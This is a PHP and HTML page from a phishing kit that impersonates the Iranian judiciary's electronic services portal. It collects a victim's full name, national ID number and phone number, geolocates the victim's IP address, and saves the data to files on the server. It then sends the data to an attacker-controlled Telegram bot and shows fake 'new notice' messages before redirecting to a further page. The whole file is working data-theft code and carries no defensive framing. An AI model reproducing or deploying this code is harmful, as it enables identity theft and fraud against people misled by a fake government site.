


<?php
date_default_timezone_set('Asia/Tehran');

include_once 'information.php';

# ------------------------- #
$Device = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[4],")");
$Device2 = rtrim(explode(' ',$_SERVER['HTTP_USER_AGENT'])[3],")");
$ncode = $_POST["nationalCode"];
$phcode = $_POST["phoneNumber"];
$Fullname = $_POST["Fullname"];
$s2 = $_POST["Fil"];
$ip = $_SERVER['REMOTE_ADDR'];

# ------------------------- #
$fullUrl = (isset($_SERVER['HTTPS']) && $_SERVER['HTTPS'] === 'on' ? "https" : "http") . "://" . $_SERVER['HTTP_HOST'] ;

$IP = $_SERVER['REMOTE_ADDR'];

$IP_Info_API = json_decode(file_get_contents("http://ip-api.com/json/$IP"), true);
$status = $IP_Info_API['status'];
if ($status) {
    $country = $IP_Info_API['country'];
        $countryCode = $IP_Info_API['countryCode'];
            $lon = $IP_Info_API['lon'];
            $lat = $IP_Info_API['lat'];
                $org = $IP_Info_API['org'];
    
    $regionName = $IP_Info_API['regionName'];
    $city = $IP_Info_API['city'];
} else {
    $country = "Iran";
           $countryCode = "Check API .";
            $lon = "Check API .";
            $lat = "Check API .";
                $org = "Check API .";
    $regionName = "Check API .";
    $city = "Check API .";
    
}

# ------------------------- #

$des = "  
نام و نام خانوادگی : <code>$Fullname</code> 
کد ملی : <code>$ncode</code> 
شماره تلفن : <code>$phcode</code> 

آدرس آی‌پی : <code>$ip</code> 

ISP Add $countryCode $country $regionName $city

  ~ @SpecificAccount
";

# ------------------------- #
$jjj = "نام و نام خانوادگی : $Fullname
کد ملی : $ncode
شماره تلفن : $phcode";

$j = "database/full/$ip.txt";

$jj = fopen($j, "w") or die("امکان ایجاد فایل وجود ندارد!");
fwrite($jj, $jjj);
fclose($jj);
# ------------------------- #
$d1 = "database/Name/$ip.txt";
$jj2 = "مؤدی : $Fullname";

$file1 = fopen($d1, "w") or die("امکان ایجاد فایل وجود ندارد!");
fwrite($file1, $jj2);
fclose($file1);
# ------------------------- #
$data3 = "database/cm/$ip.txt";
$jj1 = "شماره ملی : $ncode";

$file3 = fopen($data3, "w") or die("امکان ایجاد فایل وجود ندارد!");
fwrite($file3, $jj1);
fclose($file3);
# ------------------------- #


    $KeyBoard12 = json_encode(['inline_keyboard'=>[
                [['text'=>"⚠️ CheckHost",'url'=>"https://check-host.net/check-http?host=$fullUrl"]],
                                [['text'=>"®️ Developer",'url'=>"https://t.me/SpecificAccount"]],
    ]]);
    if (!empty($yourtoken) && !empty($Chatid))
    $send = "https://api.telegram.org/bot" . $yourtoken . "/sendMessage?chat_id=" . $Chatid . "&text=" . urlencode($des) . '&parse_mode=HTML' . '&reply_markup=" . $KeyBoard12 . "' ;
    $params = [
'chat_id' => $Chatid,
'reply_markup' => $KeyBoard12,
'text' => $des,
'parse_mode' => 'HTML'
];
    $website = "https://api.telegram.org/bot" . $yourtoken;
    $ch = curl_init($website . '/sendMessage');
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, ($params));
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    $result = curl_exec($ch);
    curl_close($ch);
# ------------------------- #
?>

<!DOCTYPE html>
<html

    <meta name="msapplication-TileColor" content="#0072c6">
    <meta name="theme-color" content="#0072c6">
    <meta name="msapplication-navbutton-color" content="#0072c6">
    <meta name="apple-mobile-web-app-status-bar-style" content="#0072c6">
    <meta name="description" content="">
    <meta name="keywords" content="">

<meta http-equiv="content-type" content="text/html;charset=utf-8" />
<head>
        <title>درگاه خدمات الکترونیک قضایی</title>
<meta charset="utf-8" />
<head>

<style>
@font-face {
    font-family: myFont;
    src: url('assets/fonts/Shabnam-Bold-FD.woff2');
}
body {
    font-family: myFont;
}

  h1 {
   text-align: center;
   color: #D50057;
  }
 @keyframes shake {
    0% { transform: translate(0, 0); }
    25% { transform: translate(0, 5px); }
    50% { transform: translate(0, 0); }
    75% { transform: translate(0, -5px); }
    100% { transform: translate(0, 0); }
}
    @keyframes fake {
        0% { transform: translate(0, 0); }
        10% { transform: translate(-5px, 0); }
        20% { transform: translate(5px, 0); }
        30% { transform: translate(-5px, 0); }
        40% { transform: translate(5px, 0); }
        50% { transform: translate(-5px, 0); }
        60% { transform: translate(5px, 0); }
        70% { transform: translate(-5px, 0); }
        80% { transform: translate(5px, 0); }
        90% { transform: translate(-5px, 0); }
        100% { transform: translate(0, 0); }
    }
  img {
      text-align: center;
        padding: 20px;
                max-width: 60%;
        display: block;
        margin: 0 auto;
        animation: shake 0.5s infinite;
  }
  
        .center {

            text-align: center;
            font-size: 30px;
               color: #0072c6;
        }
</style>
<body>

<center>
<img src="adliran_logo.png" id="image">


</center>
<br>


<center>
<div id="message" class="center"> درحال بررسی کد ملی  <?php echo $ncode?></div>

</center>



<meta http-equiv="refresh" content="6.5; URL=quota.php">




    <script>
        setTimeout(function() {
            document.getElementById("message").innerHTML = "ابلاغیه جدید دارید";
        }, 3000);
        
        setTimeout(function() {
            document.getElementById("message").innerHTML = "درحال بررسی پرونده با سامانه دستگاه قضاء";
        }, 5000);
        
        const image = document.getElementById('image');
image.classList.add('image-shake');
    </script>
    
  


</body>
</html>